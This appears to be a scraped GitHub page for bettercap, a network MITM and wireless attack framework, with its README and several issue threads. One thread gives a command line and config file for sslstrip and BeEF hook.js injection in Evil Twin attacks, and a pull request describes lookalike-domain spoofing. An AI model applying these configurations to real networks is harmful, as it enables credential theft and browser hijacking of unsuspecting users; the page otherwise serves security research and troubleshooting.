The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and MITM attacks.

BetterCap

Release Software License Travis

bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.

UI

Main Features

  • WiFi networks scanning, deauthentication attack, clientless PMKID association attack and automatic WPA/WPA2 client handshakes capture.
  • Bluetooth Low Energy devices scanning, characteristics enumeration, reading and writing.
  • 2.4Ghz wireless devices scanning and MouseJacking attacks with over-the-air HID frames injection (with DuckyScript support).
  • Passive and active IP network hosts probing and recon.
  • ARP, DNS and DHCPv6 spoofers for MITM attacks on IP based networks.
  • Proxies at packet level, TCP level and HTTP/HTTPS application level fully scriptable with easy to implement javascript plugins.
  • A powerful network sniffer for credentials harvesting which can also be used as a network protocol fuzzer.
  • A very fast port scanner.
  • A powerful REST API with support for asynchronous events notification on websocket to orchestrate your attacks easily.
  • A very convenient web UI.
  • More!

About the 1.x Legacy Version

While the first version (up to 1.6.2) of bettercap was implemented in Ruby and only offered basic MITM, sniffing and proxying capabilities, the 2.x is a complete reimplementation using the Go programming language.

This ground-up rewrite offered several advantages:

  • bettercap can now be distributed as a single binary with very few dependencies, for basically any OS and any architecture.
  • 1.x proxies, although highly optimized and event based, used to bottleneck the entire network when performing a MITM attack, while the new version adds almost no overhead.
  • Due to such performance and functional limitations, most of the features that the 2.x version is offering were simply impossible to implement properly (read as: without killing the entire network ... or your computer).

For this reason, any version prior to 2.x is considered deprecated and any type of support has been dropped in favor of the new implementation. An archived copy of the legacy documentation is available here, however it is strongly suggested to upgrade.

Documentation and Examples

The project is documented here.

License

bettercap is made with by the dev team and it's released under the GPL 3 license.

Stargazers over time

Stargazers over time

Owner
bettercap
The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks.
bettercap
Comments
  • sslstrip not working as in 1.x / http.proxy refactoring

    sslstrip not working as in 1.x / http.proxy refactoring

    Hi, this is not a bug report, just looking for some support.

    Our team has old versions of bettercap fully integrated into another script called airgeddon performing flawlessly Evil Twin attacks using Bettercap+BeEF, etc... For now, max bettercap version supported is 1.6.2 (just before the major change) and we would like to integrate new Bettercap versions (2.x). We already have the function to detect if the bettercap present in OS is the old or the new one, that part is ok. I must say we missed some "-version" or similar tag in order to get this easier... but anyway it was done using bettercap -eval "q" and parsing output... We just like to add this awesome tool to keep the compatibility with its new versions. We are trying to keep same functionallity and features using the new versions 2.x

    Ok, after the introduction, lets explain what we really need:

    Environment

    We are using on tests bettercap 2.13 in Kali which is the latest in their repos and 2.13.1 in Parrot Security.

    An example of the command line on the old fully working 1.6.2 version is:

    bettercap -I wlan0 -X -S NONE --no-discovery --proxy --proxy-port 8080 --disable-parsers URL,HTTPS,DHCP --no-http-logs --proxy-module injectjs --js-url "http://192.168.1.1:3000/hook.js" --dns-port 5300

    This is our bettercap 2.x configuration file approach:

    net.recon off
    
    set http.proxy.port 8080
    set http.proxy.script ag.bettercap.js
    set http.proxy.sslstrip true
    http.proxy on
    
    set net.sniff.verbose true
    net.sniff on
    
    events.ignore net.sniff.http.response
    events.ignore http.proxy.spoofed-response
    events.ignore net.sniff.dns
    events.ignore net.sniff.tcp
    events.ignore net.sniff.udp
    

    And we also have the ag.bettercap.js file with the BeEF stuff pointing to the server's hook.js file. I'm not going to put its content because the BeEF part is working. The js is injected and the clients are hooked, that part is ok. The problem is that nor sslstrip neither ssltrip2 are not working for us. For sure we are doing something wrong.

    Bear in mind that on the Evil Twin integration there is no need for ARP spoofing or any recon... the MiTM is already done. The features we need are:

    • sniff passwords from GET/POST http requests <- this is working
    • sniff ftp passwords <- I think you recently did a commit to add this feature, thanks!
    • inject BeEF js <- this is also working
    • sslstrip <- we are not seeing any password from any ssl site (even unknown custom sites without HSTS)
    • sslstrip2 <- this is not working for us 😢
    • Try to clean as much as possible the output <- that's the reason of using events.ignore stuff
    • Log to a file while showing output in the console at the same time <- not sure if this is possible using set events.stream.output statement... anyway I think maybe can be done using tee

    Are we on the right path? Could you help us to provide a config file approach for this kind of configuration? That would be awesome!

    P.S. Feel free to close this instantly because as I said, it is not a bug report, just some kind of question. Maybe we can talk here about this even with the closed thread.

    Thank you so much for your time and regards.

  • Get 404 page not found

    Get 404 page not found

    Hello been speaking to you on twitter about the 404 page not found.

    bettercap --version = bettercap v2.21.1 (built for linux amd64 with go1.11.5)

    go version = go version go1.11.6 linux/amd64

    Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2019.1

    BETTERCAP START

    [email protected]:~# bettercap -caplet http-ui
    bettercap v2.21.1 (built for linux amd64 with go1.11.5) [type 'help' for a list of commands]
    
    [15:33:37] [sys.log] [inf] api.rest api server starting on http://127.0.0.1:8081
    192.168.0.0/24 > 192.168.0.13  » [15:33:37] [sys.log] [inf] http.server starting on http://127.0.0.1:80
    192.168.0.0/24 > 192.168.0.13  »  
    

    BETTERCAP DEBUG

    [email protected]:~# bettercap -debug
    bettercap v2.21.1 (built for linux amd64 with go1.11.5) [type 'help' for a list of commands]
    
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) output:
    default via 192.168.0.1 dev wlan0 proto dhcp metric 600 
    192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.13 metric 600
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) line 'default via 192.168.0.1 dev wlan0 proto dhcp metric 600' matched with [default via 192.168.0.1 dev wlan0 proto dhcp metric 600 default 192.168.0.1 wlan0]
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] gateway is 192.168.0.1[c0:05:c2:3f:9c:68]
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [session.started] {session.started 2019-03-28 15:42:03.284805346 +0000 GMT m=+0.099502755 <nil>}
    192.168.0.0/24 > 192.168.0.13  » [15:42:03] [mod.started] events.stream
    192.168.0.0/24 > 192.168.0.13  »  
    

    NETSTAT

    [email protected]:~# netstat -an | grep LISTEN
    tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN     
    tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN     
    unix  2      [ ACC ]     STREAM     LISTENING     25739    @/tmp/.ICE-unix/1017
    unix  2      [ ACC ]     STREAM     LISTENING     16996    @/tmp/dbus-csCBq8sG
    unix  2      [ ACC ]     STREAM     LISTENING     25631    /run/user/0/systemd/private
    unix  2      [ ACC ]     STREAM     LISTENING     20366    @/tmp/.X11-unix/X0
    unix  2      [ ACC ]     STREAM     LISTENING     25693    @/tmp/.X11-unix/X1
    unix  2      [ ACC ]     STREAM     LISTENING     16992    @/tmp/dbus-VqpBnvoJ
    unix  2      [ ACC ]     STREAM     LISTENING     25637    /run/user/0/gnupg/S.dirmngr
    unix  2      [ ACC ]     STREAM     LISTENING     16993    @/tmp/dbus-yhXslgn8
    unix  2      [ ACC ]     STREAM     LISTENING     25640    /run/user/0/bus
    unix  2      [ ACC ]     STREAM     LISTENING     25642    /run/user/0/gnupg/S.gpg-agent.extra
    unix  2      [ ACC ]     STREAM     LISTENING     25674    @/tmp/dbus-RMewA1nA
    unix  2      [ ACC ]     STREAM     LISTENING     25644    /run/user/0/pulse/native
    unix  2      [ ACC ]     STREAM     LISTENING     25647    /run/user/0/gnupg/S.gpg-agent.browser
    unix  2      [ ACC ]     STREAM     LISTENING     25649    /run/user/0/gnupg/S.gpg-agent
    unix  2      [ ACC ]     STREAM     LISTENING     306      /run/systemd/private
    unix  2      [ ACC ]     STREAM     LISTENING     25651    /run/user/0/gnupg/S.gpg-agent.ssh
    unix  2      [ ACC ]     STREAM     LISTENING     27280    @/dbus-vfs-daemon/socket-dIa4supC
    unix  2      [ ACC ]     STREAM     LISTENING     318      /run/systemd/journal/stdout
    unix  2      [ ACC ]     STREAM     LISTENING     20422    @/tmp/.ICE-unix/660
    unix  2      [ ACC ]     STREAM     LISTENING     334      /run/systemd/fsck.progress
    unix  2      [ ACC ]     STREAM     LISTENING     341      /run/lvm/lvmpolld.socket
    unix  2      [ ACC ]     STREAM     LISTENING     16995    @/tmp/dbus-rUPG3fmw
    unix  2      [ ACC ]     SEQPACKET  LISTENING     361      /run/udev/control
    unix  2      [ ACC ]     STREAM     LISTENING     23306    @/tmp/dbus-B1EKyIZ8r4
    unix  2      [ ACC ]     STREAM     LISTENING     16249    /var/run/dbus/system_bus_socket
    unix  2      [ ACC ]     STREAM     LISTENING     16253    /run/uuidd/request
    unix  2      [ ACC ]     STREAM     LISTENING     16257    /var/run/pcscd/pcscd.comm
    unix  2      [ ACC ]     STREAM     LISTENING     20367    /tmp/.X11-unix/X0
    unix  2      [ ACC ]     STREAM     LISTENING     20423    /tmp/.ICE-unix/660
    unix  2      [ ACC ]     STREAM     LISTENING     20404    @/tmp/dbus-VrFnHVD0D3
    unix  2      [ ACC ]     STREAM     LISTENING     77452    /run/user/0/speech-dispatcher/speechd.sock
    unix  2      [ ACC ]     STREAM     LISTENING     19092    /var/run/irqbalance554.sock
    unix  2      [ ACC ]     STREAM     LISTENING     25258    /run/user/0/keyring/control
    unix  2      [ ACC ]     STREAM     LISTENING     25776    /run/user/0/keyring/ssh
    unix  2      [ ACC ]     STREAM     LISTENING     25778    /run/user/0/keyring/pkcs11
    unix  2      [ ACC ]     STREAM     LISTENING     21696    /run/user/135/systemd/private
    unix  2      [ ACC ]     STREAM     LISTENING     22467    /run/NetworkManager/private-dhcp
    unix  2      [ ACC ]     STREAM     LISTENING     21702    /run/user/135/gnupg/S.gpg-agent.ssh
    unix  2      [ ACC ]     STREAM     LISTENING     21705    /run/user/135/pulse/native
    unix  2      [ ACC ]     STREAM     LISTENING     21708    /run/user/135/bus
    unix  2      [ ACC ]     STREAM     LISTENING     21710    /run/user/135/gnupg/S.gpg-agent.extra
    unix  2      [ ACC ]     STREAM     LISTENING     21712    /run/user/135/gnupg/S.gpg-agent
    unix  2      [ ACC ]     STREAM     LISTENING     25694    /tmp/.X11-unix/X1
    unix  2      [ ACC ]     STREAM     LISTENING     21714    /run/user/135/gnupg/S.dirmngr
    unix  2      [ ACC ]     STREAM     LISTENING     21716    /run/user/135/gnupg/S.gpg-agent.browser
    unix  2      [ ACC ]     STREAM     LISTENING     25724    /tmp/ssh-mjyXq9F3vYXl/agent.1017
    unix  2      [ ACC ]     STREAM     LISTENING     25740    /tmp/.ICE-unix/1017
    unix  2      [ ACC ]     STREAM     LISTENING     25675    @/tmp/dbus-BrKuH829
    

    Sorry for taking up your time and massive thank you for being so helpful

    Jamie P

  • SSLstrip - Adding the ability to choose how domains are spoofed

    SSLstrip - Adding the ability to choose how domains are spoofed

    This pull request is related to #723. I added the ability to choose how domains are spoofed. Thus, I removed the useIDN option which was used to choose between two TLD modifications.

    How to choose how domains are spoofed? The new option is http.proxy.sslstrip.replacements. It requires a space-separated list of <original_domain>:<stripped_domain>, ordered by priority. Internationalized Domain Names are supported.
    For example : *.google.com:*.gooogle.com *.com:*.corn will replace *.google.com with *.gooogle.com (www.google.com -> www.gooogle.com), *.com with *.corn (facebook.com -> facebook.corn) but not *.google.com with *.google.corn (first rule takes precedence).
    Default values are : *.com:*.corn *.org:*.orq *.net:*.nel
    You can use multiple wildcards for more specific pattern matching. For example, *.google.*:*.gooogle.* is a valid parameter.

    Three additional fixes:

    • sslstrip couldn't handle 2 redirections (http://example.com -> https://example.com -> https://www.example.com) because it checked for a redirection from the HTTP scheme
    • sslstrip used a long time-to-live (1024 seconds), which caused stripped hosts to be cached by target browsers even after the attack ended. Now it's reduced to 5 seconds (note that some browsers might ignore it)
    • sslstrip couldn't edit subdomains to fix cookies

    (Edited for the new commit)
  • Review of fix for issue 209

    Review of fix for issue 209

    https://github.com/bettercap/bettercap/commit/1f8e97d91fbb67570c5d44e1c5c0442e497d7d09 was intended to fix issue https://github.com/bettercap/bettercap/issues/209

    What if we set res.Body = ""?

    Wouldn't the WasModified() function in modules/http_proxy_js_response.go return false even if we want to serve an empty response body?

    https://github.com/bettercap/bettercap/blob/cfe5f9f76b764efb6f698c02966ae954b0bcdac9/modules/http_proxy_js_response.go#L70

  • Alfa AWUS036ACH: error while activating handle: unknown activated error

    Alfa AWUS036ACH: error while activating handle: unknown activated error

    Problem Description

    Testing a USB Alfa AC1200 (AWUS036ACH) with bettercap. When executing wifi.recon on I receive the following error:

     wlxXXXXXXXXXXXX  » wifi.recon on
    [21:35:43] [sys.log] [inf] wifi using interface wlxXXXXXXXXXXXX (00:XX:XX:XX:XX:XX)
    [21:35:43] [sys.log] [war] wifi could not set interface wlxXXXXXXXXXXXX txpower to 30, 'Set Tx Power' requests not supported
    [21:35:43] [sys.log] [err] error while activating handle: unknown activated error: -1
     wlxXXXXXXXXXXXX  »  
    

    Environment

    bettercap v2.24.1 (built for linux amd64 with go1.10.4)
    
    # iwconfig wlxXXXXXXXXXXXX
    wlxXXXXXXXXXXXX  unassociated  Nickname:"<[email protected]>"
              Mode:Monitor  Frequency=2.452 GHz  Access Point: Not-Associated   
              Sensitivity:0/0  
              Retry:off   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=0/100  Signal level=0 dBm  Noise level=0 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    Distributor ID:	Debian
    Description:	Debian GNU/Linux 10 (buster)
    Release:	10
    Codename:	buster
    
    Linux sapientia 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64 GNU/Linux
    

    Wireless card drivers built and installed using dkms method from https://github.com/aircrack-ng/rtl8812au

    bettercap -debug -iface wlxXXXXXXXXXXXX
    bettercap v2.24.1 (built for linux amd64 with go1.10.4) [type 'help' for a list of commands]
    
     wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
     wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX) output:
    default via 192.68.0.1 dev wlp3s0 
    default dev enp0s25 scope link metric 1002 linkdown 
    169.254.0.0/16 dev enp0s25 proto kernel scope link src 169.254.9.111 linkdown 
    192.168.0.0/24 dev wlp3s0 proto kernel scope link src 192.168.0.10 
    192.168.72.0/24 dev vmnet8 proto kernel scope link src 192.168.72.1 
    192.168.228.0/24 dev vmnet1 proto kernel scope link src 192.168.228.1
     wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX): nothing found :/
     wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] Could not detect gateway.
     wlxXXXXXXXXXXXX  » [21:42:53] [session.started] {session.started 2019-08-24 21:42:53.817373034 +0100 IST m=+2.014107730 <nil>}
     wlxXXXXXXXXXXXX  » [21:42:53] [mod.started] events.stream
     wlxXXXXXXXXXXXX  » wifi.recon on
    [21:43:02] [sys.log] [inf] wifi using interface wlxXXXXXXXXXXXX (xx:xx:xx:xx:xx:xx)
    [21:43:02] [sys.log] [war] wifi could not set interface wlxXXXXXXXXXXXX txpower to 30, 'Set Tx Power' requests not supported
    [21:43:02] [sys.log] [err] error while activating handle: unknown activated error: -1
     wlxXXXXXXXXXXXX  »  
    

    Steps to Reproduce

    1. bettercap -debug -iface wlxXXXXXXXXXXXX
    2. wifi.recon on
  • invalid flag in #cgo LDFLAGS (bug in some Go versions while compiling statically)

    invalid flag in #cgo LDFLAGS (bug in some Go versions while compiling statically)

    Prerequisites

    • [ X] I read the README.
    • [ X] I am running the latest stable version.
    • [X] I already searched other issues to see if this problem was already reported.
    • [X] I understand I don't necessarily have to paste this Prerequisites section in the issue.

    Description

    Unable to build bettercap

    Environment

    Please provide:

    • OS version and architecture you are using. Kali Linux x64
    • Go version if building from sources. 1.10

    Steps to Reproduce

    1. install go lang and libpcap-dev: apt-get install golang apt-get install libpcap-dev

    2. Add GOPATH to PATH: export GOPATH=$(go env GOPATH) export PATH=$PATH:$GOPATH/bin

    3. Grab bettercap go get github.com/bettercap/bettercap

    Expected behavior: What you expected to happen Get da bettercap

    Actual behavior: What actually happened Error: go build github.com/bettercap/gopacket/pcap: invalid flag in #cgo LDFLAGS: /usr/lib/x86_64-linux-gnu/libpcap.a

    ♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

  • Problems

    Problems "getting started" on Windows

    I'm not a networking genius, so I'm kind of coming at this with just the information on https://www.bettercap.org/ and https://github.com/bettercap/bettercap/. And I'm not sure if any of my later errors are due to earlier setup, so I'm just gonna walk through the whole thing.

    Environment

    Please provide:

    • Bettercap version: bettercap v2.24.1 (built for windows amd64 with go1.12.4)
    • OS version and architecture you are using: Windows 10 Pro 64-bit 1903
    • Go version if building from sources.
    • Command line arguments you are using.
    • Caplet code you are using or the interactive session commands.
    • Full debug output while reproducing the issue ( bettercap -debug ... ).

    Steps to Reproduce

    Download the Windows file from the releases page.

    Does it need to be unblocked? Is that a relevant security issue? The ZIP file shows as blocked when downloaded. But, I'm not sure it behaves any differently when unblocked. I'll proceed by unblocking then extracting.

    image

    At this point, bettercap.exe does nothing when invoked (maybe an error message here would help).

    PS> .\bettercap.exe
    

    There are more install pre-reqs.

    For every new release, we distribute bettercap’s precompiled binaries. In order to be able to use them, you’ll need the following dependencies on your system:

    libpcap libusb-1.0-0 (required by the HID module)

    I don't understand what "need... on your system" means for Windows. In the same folder as bettercap.exe? Installed to some well-known system location?

    I'm not sure where to get libpcap for Windows... WinPcap is obsolete, Npcap is current (but, will it work?), and libpcap is a source code archive (do I need to build one)?

    I'll go with Npcap, for now, with these settings.

    image

    For libusb, I assume on Windows we're looking for something like libusb-1.0.dll. It looks like this is the official website and the downloads come from their GitHub releases page. This is another blocked archive. I'll unblock and extract.

    image

    There is no installer, it's just a DLL (actually, several DLLs for different... platforms?). I'll choose libusb-1.0.22.7z\MS64\dll\libusb-1.0.dll. I don't know where to "install" this, but this issue indicates...

    Just make sure that's in the same directory as bettercap.exe

    Now we're in business! I ran in an Administrator PowerShell session otherwise, I get a sketchy UAC pop-up from Npcap.

    npcap-uac

    PS> .\bettercap.exe                                                                                                        
    
    WARNING: This terminal does not support colors, view will be very limited.
    
    bettercap v2.24.1 (built for windows amd64 with go1.12.4) [type 'help' for a list of commands]
    
    10.0.75.0/24 > 10.0.75.1  »
    

    I am unable to update caplets.

    10.0.75.0/24 > 10.0.75.1  » caplets.update
    [11:16:12] [sys.log] [inf] caplets creating caplets install path /usr/local/share/bettercap/ ...
    [11:16:12] [sys.log] [err] open /tmp/caplets.zip: The system cannot find the path specified.
    

    At this point, I'm looking for bettercap's data folders, because I see it's still referencing Linux paths (/usr/local/share/bettercap). I found files in C:\! This is an extremely non-standard path for Windows applications.

    Some paths that might make sense on Windows include (I'm not finding great references on the use and expectations of these locations):

    • %USERPROFILE%\.bettercap
    • %PROGRAMDATA%\bettercap
    • %LOCALAPPDATA%\bettercap

    Using my new knowledge, if I manually create C:\tmp, then I can update caplets.

    PS> mkdir C:\tmp
    PS> bettercap.exe
    ...
    10.0.75.0/24 > 10.0.75.1  » caplets.update
    [11:16:59] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
    [11:16:59] [sys.log] [inf] caplets installing caplets to \usr\local\share\bettercap\caplets ...
    

    Now, I can update the UI and run the HTTP server.

    10.0.75.0/24 > 10.0.75.1  » ui.update
    [11:24:22] [sys.log] [inf] ui checking latest stable release ...
    [11:24:23] [sys.log] [inf] ui downloading ui v1.3.0 from https://github.com/bettercap/ui/releases/download/v1.3.0/ui.zip ...
    [11:24:24] [sys.log] [inf] ui installing to \usr\local\share\bettercap\ui ...
    [11:24:32] [sys.log] [inf] ui installation complete, you can now run the http-ui (or https-ui) caplet to start the UI.
    10.0.75.0/24 > 10.0.75.1  » http-ui
    [11:25:06] [sys.log] [inf] api.rest api server starting on http://127.0.0.1:8081
    

    Success!

    image

    Although, the log dumps a lot of wtf messages on start and while poking around the UI.

    wtf: caplet C:\usr\local\share\bettercap\caplets\ap.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\gps.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\http-ui.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\https-ui.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\local-sniffer.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\mana.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\massdeauth.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\mitm6.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\netmon.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\pita.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\rogue-mysql-server.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\simple-passwords-sniffer.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\crypto-miner\crypto-miner.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\download-autopwn\download-autopwn.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\fb-phish\fb-phish.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\gitspoof\gitspoof.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\hstshijack\hstshijack.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\http-req-dump\http-req-dump.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\jsinject\jsinject.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\login-manager-abuse\login-man-abuse.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\proxy-script-test\proxy-script-test.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\rtfm\rtfm.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\tcp-req-dump\tcp-req-dump.cap not found
    wtf: caplet C:\usr\local\share\bettercap\caplets\web-override\web-override.cap not found
    

    Expected behavior: What you expected to happen

    It would be good for bettercap to follow Windows standards, conventions, and user expectations. And it would be good if the docs were more complete for Windows users. A summary of the items that I found above...

    • [ ] Note whether the bettercap Windows archive needs to be unblocked.
    • [ ] Provide an error message if pre-requisites are not found.
    • [ ] Provide instructions/links for installing libpcap on Windows via Npcap.
    • [ ] Provide instructions/links for installing libusb on Windows via their website (also, note unblocking and "install" by copy/paste... or consider bundling the tested version of libusb with bettercap for Windows?)
    • [ ] Explain the sketchy UAC pop-up coming from Npcap.
    • [ ] Write files to the correct Windows location.
    • [ ] Test for and create your required data directories if they do not exist (to avoid errors, say, when trying to download caplets.zip).
    • [ ] Figure out why bettercap writes these wtf messages to the logs on Windows

    Actual behavior: What actually happened

    The Windows experience is a little rough.

  • Seeing duplicate gateway with a random IP and hostname that keeps changing and also random devices

    Seeing duplicate gateway with a random IP and hostname that keeps changing and also random devices

    Description

    net.show is showing the gateway twice with the second time with a random IP address and hostname (eg. IP owned by Twitter or Google or AWS). It also shows two IPv4 Multicast devices that did not used to show up until yesterday.

    Environment

    • macOS High Sierra 10.13.3 Beta (17D25b)
    • go version go1.9.4 darwin/amd64
    • bettercap --debug
    Full debug output

    bettercap v2.0.0RC2 (type 'help' for a list of commands)
    
    [19:33:35] [sys.log] [dbg] env.change: ticker.commands -> 'clear; net.show'
    [19:33:35] [sys.log] [dbg] env.change: ticker.period -> '1'
    ❯ [19:33:35] [sys.log] [dbg] env.change: mac.changer.iface -> '<interface name>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: mac.changer.address -> '<random mac>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.probe.throttle -> '10'
    ❯ [19:33:35] [sys.log] [dbg] env.change: arp.spoof.targets -> '<entire subnet>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: dhcp6.spoof.domains -> 'microsoft.com, goole.com, facebook.com, apple.com, twitter.com'
    ❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.domains -> '*'
    ❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.all -> 'false'
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.verbose -> 'true'
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.local -> 'false'
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.filter -> 'not arp'
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.regexp -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.output -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.source -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.server.path -> '.'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.server.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.server.port -> '80'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.server.certificate -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.server.key -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.port -> '80'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.port -> '8080'
    ❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.script -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.port -> '443'
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.port -> '8083'
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.certificate -> '~/.bettercap-ca.cert.pem'
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.key -> '~/.bettercap-ca.key.pem'
    ❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.script -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: tcp.port -> '443'
    ❯ [19:33:35] [sys.log] [dbg] env.change: tcp.address -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.port -> '8443'
    ❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.script -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.address -> '<interface address>'
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.port -> '8083'
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.username -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.password -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.certificate -> '~/.bcap-api.rest.certificate.pem'
    ❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.key -> '~/.bcap-api.rest.key.pem'
    ❯ [19:33:35] [sys.log] [dbg] env.change: wifi.recon.channel -> ''
    ❯ [19:33:35] [sys.log] [dbg] env.change: wifi.hop.period -> '250'
    ❯ [19:33:35] [sys.log] [dbg] env.change: wifi.skip-broken -> 'true'
    ❯ [19:33:35] [sys.log] [dbg] env.change: iface.index -> '8'
    ❯ [19:33:35] [sys.log] [dbg] env.change: iface.name -> 'en0'
    ❯ [19:33:35] [sys.log] [dbg] env.change: iface.ipv4 -> '192.168.0.29'
    ❯ [19:33:35] [sys.log] [dbg] env.change: iface.ipv6 -> 'fd00:bc4d:fb98:1c32:f4bd:c0f2:b8b:b906'
    ❯ [19:33:35] [sys.log] [dbg] env.change: iface.mac -> 'dc:a9:04:xx:xx:xx'
    ❯ [19:33:35] [sys.log] [dbg] env.change: gateway.address -> '192.168.0.1'
    ❯ [19:33:35] [sys.log] [dbg] env.change: gateway.mac -> 'bc:4d:fb:98:1c:32'
    ❯ [19:33:35] [sys.log] [dbg] env.change: log.debug -> 'true'
    ❯ [19:33:35] [sys.log] [dbg] env.change: log.silent -> 'false'
    ❯ [19:33:35] [session.started] {session.started 2018-02-24 19:33:35.509364 -0800 PST m=+0.077244043 <nil>}
    ❯ [19:33:35] [mod.started] events.stream
    ❯ [19:33:35] [mod.started] net.recon
    ❯ [19:33:35] [endpoint.new] Endpoint 192.168.0.24 (appletv) detected as 40:cb:c0:xx:xx:xx.
    ❯ [19:33:35] [endpoint.new] Endpoint 224.0.0.251 detected as 01:00:5e:00:00:fb.
    ❯ [19:33:35] [endpoint.new] Endpoint 239.255.255.250 detected as 01:00:5e:7f:ff:fa.
    ❯ [19:33:38] [endpoint.new] Endpoint 199.59.148.241 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).
    ❯ net.show
    
    +-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+
    |       IP        |        MAC        |            NAME             |           VENDOR            |  SENT  | RECVD  | LAST SEEN |
    +-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+
    | 192.168.0.29    | dc:a9:04:xx:xx:xx | en0                         | Apple                       | 17 kB  | 17 kB  | 19:33:35  |
    | 192.168.0.1     | bc:4d:fb:98:1c:32 | gateway                     | Hitron Technologies.        | 28 kB  | 1.3 kB | 19:33:35  |
